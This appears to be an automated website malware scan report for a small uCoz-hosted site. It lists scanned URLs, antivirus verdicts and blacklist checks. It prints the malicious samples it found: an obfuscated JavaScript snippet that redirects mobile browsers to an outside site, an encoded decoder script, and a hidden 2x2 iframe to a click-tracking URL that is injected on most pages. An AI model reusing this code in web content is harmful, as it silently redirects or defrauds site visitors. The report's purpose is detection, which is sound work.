New scan:

Malware Scanner report for tysoffka.vo.uz

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/10/10
10 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://tysoffka.vo.uz/
200 OK
Content-Length: 46013
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://tak.ru/clicks.php?key=625154161835710600857358870753171

<iframe src="http://tak.ru/clicks.php?key=625154161835710600857358870753171" width="2" height="2" scrolling="no"frameborder="0">

http://s8.ucoz.net/src/jquery-1.7.2.js
200 OK
Content-Length: 94840
Content-Type: text/javascript
clean
http://s8.ucoz.net/src/ulightbox/ulightbox.js
200 OK
Content-Length: 39848
Content-Type: text/javascript
clean
http://s8.ucoz.net/src/uwnd.js?2
200 OK
Content-Length: 228798
Content-Type: text/javascript
clean
http://games-portal.net.ua/jquery1.6.js
200 OK
Content-Length: 464
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var _0x9904=["\x6D\x61\x74\x63\x68","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x67\x6C\x65\x2D\x70\x6C\x61\x79\x2D\x6D\x61\x79\x2E\x63\x6F\x6D\x2F\x73\x2F\x31\x31\x36\x34\x33"];if(navigator[_0x9904[1]][_0x9904[0]](/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){window[_0x9904[2]]=_0x9904[3];} ;

Antivirus reports:

Avast
JS:ScriptXE-inf [Trj]
Ikarus
JS.ScriptXE

http://tysoffka.vo.uz/gb/
200 OK
Content-Length: 33430
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var _y8M=''; function _dS(s){ var i;var r=""; var l=s.length-1; var k=s.substr(l,1); for (i=0;i<l;i++){ c=s.charCodeAt(i)-k; if(c<32){ c=127-(32-c);} r+=String.fromCharCode(c); } return r;} _y8M=_dS('Dqvx}|(|"xmE*pqllmv*(viumE*{w{*(~it}mE*::?:A=;89>*(7F8');

Antivirus reports:

McAfee-GW-Edition
Heuristic.BehavesLike.JS.Suspicious.A

Hidden iFrame found.
size: 2x2     
src: http://tak.ru/clicks.php?key=625154161835710600857358870753171

<iframe src="http://tak.ru/clicks.php?key=625154161835710600857358870753171" width="2" height="2" scrolling="no"frameborder="0">

http://tysoffka.vo.uz/dir/
200 OK
Content-Length: 23132
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://tak.ru/clicks.php?key=625154161835710600857358870753171

<iframe src="http://tak.ru/clicks.php?key=625154161835710600857358870753171" width="2" height="2" scrolling="no"frameborder="0">

http://tysoffka.vo.uz/dir/1
200 OK
Content-Length: 11219
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://tak.ru/clicks.php?key=625154161835710600857358870753171

<iframe src="http://tak.ru/clicks.php?key=625154161835710600857358870753171" width="2" height="2" scrolling="no"frameborder="0">

http://tysoffka.vo.uz/test404page.js
404 Not Found
Content-Length: 6933
Content-Type: text/html
clean
http://tysoffka.vo.uz/dir/2
200 OK
Content-Length: 11233
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://tak.ru/clicks.php?key=625154161835710600857358870753171

<iframe src="http://tak.ru/clicks.php?key=625154161835710600857358870753171" width="2" height="2" scrolling="no"frameborder="0">

http://tysoffka.vo.uz/dir/3
200 OK
Content-Length: 11229
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://tak.ru/clicks.php?key=625154161835710600857358870753171

<iframe src="http://tak.ru/clicks.php?key=625154161835710600857358870753171" width="2" height="2" scrolling="no"frameborder="0">

http://tysoffka.vo.uz/dir/4
200 OK
Content-Length: 11205
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://tak.ru/clicks.php?key=625154161835710600857358870753171

<iframe src="http://tak.ru/clicks.php?key=625154161835710600857358870753171" width="2" height="2" scrolling="no"frameborder="0">

http://tysoffka.vo.uz/dir/5
200 OK
Content-Length: 11209
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://tak.ru/clicks.php?key=625154161835710600857358870753171

<iframe src="http://tak.ru/clicks.php?key=625154161835710600857358870753171" width="2" height="2" scrolling="no"frameborder="0">

http://tysoffka.vo.uz/dir/6
200 OK
Content-Length: 11261
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://tak.ru/clicks.php?key=625154161835710600857358870753171

<iframe src="http://tak.ru/clicks.php?key=625154161835710600857358870753171" width="2" height="2" scrolling="no"frameborder="0">

http://tysoffka.vo.uz/dir/7
200 OK
Content-Length: 11251
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://tak.ru/clicks.php?key=625154161835710600857358870753171

<iframe src="http://tak.ru/clicks.php?key=625154161835710600857358870753171" width="2" height="2" scrolling="no"frameborder="0">


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: tysoffka.vo.uz

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Apr 2014 19:15:15 GMT
Server: uServ/3.2.2
Content-Length: 46013
Content-Type: text/html; charset=UTF-8

...46013 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tysoffka.vo.uz
Referer: http://www.google.com/search?q=tysoffka.vo.uz

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=tysoffka.vo.uz

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tysoffka.vo.uz/

Result: tysoffka.vo.uz is not infected or malware details are not published yet.